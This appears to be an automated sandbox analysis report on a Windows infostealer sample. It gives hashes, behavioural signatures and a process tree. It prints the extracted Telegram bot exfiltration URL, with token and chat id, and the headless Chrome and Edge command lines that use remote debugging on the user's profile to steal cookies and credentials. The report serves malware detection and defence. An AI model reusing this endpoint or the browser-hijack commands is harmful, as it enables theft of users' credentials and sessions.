Analysis
-
max time kernel
129s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
03/04/2025, 10:28
Static task
static1
Behavioral task
behavioral1
Sample
2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe
Resource
win10v2004-20250314-en
General
-
Target
2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe
-
Size
5.7MB
-
MD5
2c2efc29fc75c25b90e1472e30e7be0a
-
SHA1
bf4d7300c88893be11e8b8c1cd84be7a421544ef
-
SHA256
def69023e3e78c66804a4a7996607540cb2c6f57eeda633a04720ce39291b103
-
SHA512
4bfc52b2abfbc478b37c29e4f642d63aa7031e502a637175e4c0e79b86a453f3e593e60a654f2f5fd2bebeb31c135c7c90d198ff738624d33d34dd3bbcdad5e7
-
SSDEEP
98304:DWl27OuKr+gvhf2U9Nzm31PMoslkqXf0FvUcwti78OqJ7TPBvc8X6Uczq:DtOuK6mn9NzgMoYkSIvUcwti7TQlvcij
Malware Config
Extracted
gurcu
https://api.telegram.org/bot7762282231:AAHXw4eRj3GOllE1bbAM7ABgQpzu_mwXV8c/sendDocument?chat_id=-4788462796&caption=%F0%9F%92%A0DOTSTEALER%F0%9F%92%A0%0A%F0%9F%92%ABNew%20log:%0AIP:%20212.102.63.147%0AUsername:%20Admin%0ALocation:%20United%20Kingdom%20[GB],%20London,%20Englan
Signatures
-
Gurcu family
-
Uses browser remote debugging 2 TTPs 10 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 4548 chrome.exe 4864 chrome.exe 4872 chrome.exe 4720 chrome.exe 5544 chrome.exe 2088 chrome.exe 1076 msedge.exe 5644 msedge.exe 6108 msedge.exe 1068 msedge.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe -
Loads dropped DLL 1 IoCs
pid Process 5416 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 1 raw.githubusercontent.com 3 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 29 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133881497102520695" chrome.exe -
Suspicious behavior: EnumeratesProcesses 31 IoCs
pid Process 5416 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 5416 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 5416 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 5416 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 5416 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 5416 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 5416 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 5416 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 5416 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 5416 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 5416 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 5416 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 5416 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 5416 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 5416 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 5416 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 5416 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 5416 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 5416 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 5416 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 5416 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 5416 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 5416 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 5416 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 5416 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 4548 chrome.exe 4548 chrome.exe 5416 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 5416 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 5416 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 5416 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
pid Process 4548 chrome.exe 4548 chrome.exe 4548 chrome.exe 4548 chrome.exe 4548 chrome.exe 1076 msedge.exe 1076 msedge.exe 1076 msedge.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
description pid Process Token: SeDebugPrivilege 5416 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe Token: SeShutdownPrivilege 4548 chrome.exe Token: SeCreatePagefilePrivilege 4548 chrome.exe Token: SeShutdownPrivilege 4548 chrome.exe Token: SeCreatePagefilePrivilege 4548 chrome.exe Token: SeShutdownPrivilege 4548 chrome.exe Token: SeCreatePagefilePrivilege 4548 chrome.exe Token: SeShutdownPrivilege 4548 chrome.exe Token: SeCreatePagefilePrivilege 4548 chrome.exe Token: SeShutdownPrivilege 4548 chrome.exe Token: SeCreatePagefilePrivilege 4548 chrome.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 4548 chrome.exe 1076 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5416 wrote to memory of 4548 5416 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 89 PID 5416 wrote to memory of 4548 5416 2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe 89 PID 4548 wrote to memory of 4608 4548 chrome.exe 90 PID 4548 wrote to memory of 4608 4548 chrome.exe 90 PID 4548 wrote to memory of 5712 4548 chrome.exe 91 PID 4548 wrote to memory of 5712 4548 chrome.exe 91 PID 4548 wrote to memory of 1688 4548 chrome.exe 92 PID 4548 wrote to memory of 1688 4548 chrome.exe 92 PID 4548 wrote to memory of 1688 4548 chrome.exe 92 PID 4548 wrote to memory of 1688 4548 chrome.exe 92 PID 4548 wrote to memory of 1688 4548 chrome.exe 92 PID 4548 wrote to memory of 1688 4548 chrome.exe 92 PID 4548 wrote to memory of 1688 4548 chrome.exe 92 PID 4548 wrote to memory of 1688 4548 chrome.exe 92 PID 4548 wrote to memory of 1688 4548 chrome.exe 92 PID 4548 wrote to memory of 1688 4548 chrome.exe 92 PID 4548 wrote to memory of 1688 4548 chrome.exe 92 PID 4548 wrote to memory of 1688 4548 chrome.exe 92 PID 4548 wrote to memory of 1688 4548 chrome.exe 92 PID 4548 wrote to memory of 1688 4548 chrome.exe 92 PID 4548 wrote to memory of 1688 4548 chrome.exe 92 PID 4548 wrote to memory of 1688 4548 chrome.exe 92 PID 4548 wrote to memory of 1688 4548 chrome.exe 92 PID 4548 wrote to memory of 1688 4548 chrome.exe 92 PID 4548 wrote to memory of 1688 4548 chrome.exe 92 PID 4548 wrote to memory of 1688 4548 chrome.exe 92 PID 4548 wrote to memory of 1688 4548 chrome.exe 92 PID 4548 wrote to memory of 1688 4548 chrome.exe 92 PID 4548 wrote to memory of 1688 4548 chrome.exe 92 PID 4548 wrote to memory of 1688 4548 chrome.exe 92 PID 4548 wrote to memory of 1688 4548 chrome.exe 92 PID 4548 wrote to memory of 1688 4548 chrome.exe 92 PID 4548 wrote to memory of 1688 4548 chrome.exe 92 PID 4548 wrote to memory of 1688 4548 chrome.exe 92 PID 4548 wrote to memory of 1688 4548 chrome.exe 92 PID 4548 wrote to memory of 1688 4548 chrome.exe 92 PID 4548 wrote to memory of 2964 4548 chrome.exe 94 PID 4548 wrote to memory of 2964 4548 chrome.exe 94 PID 4548 wrote to memory of 2964 4548 chrome.exe 94 PID 4548 wrote to memory of 2964 4548 chrome.exe 94 PID 4548 wrote to memory of 2964 4548 chrome.exe 94 PID 4548 wrote to memory of 2964 4548 chrome.exe 94 PID 4548 wrote to memory of 2964 4548 chrome.exe 94 PID 4548 wrote to memory of 2964 4548 chrome.exe 94 PID 4548 wrote to memory of 2964 4548 chrome.exe 94 PID 4548 wrote to memory of 2964 4548 chrome.exe 94 PID 4548 wrote to memory of 2964 4548 chrome.exe 94 PID 4548 wrote to memory of 2964 4548 chrome.exe 94 PID 4548 wrote to memory of 2964 4548 chrome.exe 94 PID 4548 wrote to memory of 2964 4548 chrome.exe 94 PID 4548 wrote to memory of 2964 4548 chrome.exe 94 PID 4548 wrote to memory of 2964 4548 chrome.exe 94 PID 4548 wrote to memory of 2964 4548 chrome.exe 94 PID 4548 wrote to memory of 2964 4548 chrome.exe 94 PID 4548 wrote to memory of 2964 4548 chrome.exe 94 PID 4548 wrote to memory of 2964 4548 chrome.exe 94 PID 4548 wrote to memory of 2964 4548 chrome.exe 94 PID 4548 wrote to memory of 2964 4548 chrome.exe 94 PID 4548 wrote to memory of 2964 4548 chrome.exe 94 PID 4548 wrote to memory of 2964 4548 chrome.exe 94 PID 4548 wrote to memory of 2964 4548 chrome.exe 94 PID 4548 wrote to memory of 2964 4548 chrome.exe 94 PID 4548 wrote to memory of 2964 4548 chrome.exe 94 PID 4548 wrote to memory of 2964 4548 chrome.exe 94
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-04-03_2c2efc29fc75c25b90e1472e30e7be0a_black-basta_hijackloader_luca-stealer.exe"1⤵
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5416 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --headless --disable-gpu2⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4548 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa94f7dcf8,0x7ffa94f7dd04,0x7ffa94f7dd103⤵PID:4608
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2132,i,16187001116403579913,2007523902023750276,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2124 /prefetch:33⤵PID:5712
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=2096,i,16187001116403579913,2007523902023750276,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2088 /prefetch:23⤵PID:1688
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2496,i,16187001116403579913,2007523902023750276,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2492 /prefetch:83⤵PID:2964
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3204,i,16187001116403579913,2007523902023750276,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3200 /prefetch:13⤵
- Uses browser remote debugging
PID:4872
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3220,i,16187001116403579913,2007523902023750276,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3212 /prefetch:13⤵
- Uses browser remote debugging
PID:4864
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4232,i,16187001116403579913,2007523902023750276,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4228 /prefetch:23⤵
- Uses browser remote debugging
PID:4720
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4644,i,16187001116403579913,2007523902023750276,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4656 /prefetch:13⤵
- Uses browser remote debugging
PID:5544
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=5332,i,16187001116403579913,2007523902023750276,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5328 /prefetch:83⤵PID:5148
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=5376,i,16187001116403579913,2007523902023750276,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5372 /prefetch:83⤵PID:208
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=5580,i,16187001116403579913,2007523902023750276,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5576 /prefetch:83⤵PID:5740
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=5336,i,16187001116403579913,2007523902023750276,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5344 /prefetch:83⤵PID:4680
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=5608,i,16187001116403579913,2007523902023750276,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5604 /prefetch:83⤵PID:5084
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=5216,i,16187001116403579913,2007523902023750276,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5644 /prefetch:83⤵PID:5320
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5440,i,16187001116403579913,2007523902023750276,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5504 /prefetch:13⤵
- Uses browser remote debugging
PID:2088
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9222 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --headless --disable-gpu2⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:1076 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x250,0x7ffa7fadf208,0x7ffa7fadf214,0x7ffa7fadf2203⤵PID:5764
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2196,i,5284956302258204058,4904594486299758131,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2192 /prefetch:33⤵PID:5872
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --always-read-main-dll --field-trial-handle=2164,i,5284956302258204058,4904594486299758131,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2152 /prefetch:23⤵PID:5524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2600,i,5284956302258204058,4904594486299758131,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2596 /prefetch:83⤵PID:3388
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3524,i,5284956302258204058,4904594486299758131,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3528 /prefetch:13⤵
- Uses browser remote debugging
PID:5644
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --pdf-upsell-enabled --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3544,i,5284956302258204058,4904594486299758131,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3548 /prefetch:13⤵
- Uses browser remote debugging
PID:6108
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4956,i,5284956302258204058,4904594486299758131,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4952 /prefetch:13⤵
- Uses browser remote debugging
PID:1068
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp7B5A.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp7B5A.tmp.bat2⤵PID:2080
-
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:2968
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:5828
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:3032
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
649B
MD504438fe9048eb581c421fa5effc96a0c
SHA169eb1349726909eed9652edd456d5f762ef7cb70
SHA256da401c47c6d2beb6cc9d82e0072f77bf6fb6697d83adbe788c29ef92bdcc8d64
SHA512771109986bb3f40d8243078c3f77a946b02ee228b16867450f12c3ba6249bc6b3d48bfe67573db8ef2ef5b56767556586c3410b57dc56d1d1dc5ad6835fe775c
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
80KB
MD51c8cd719a95c36dddee8d2057e0c9bd0
SHA1d387738fc9ef59629f128de54e1906cc4bc69286
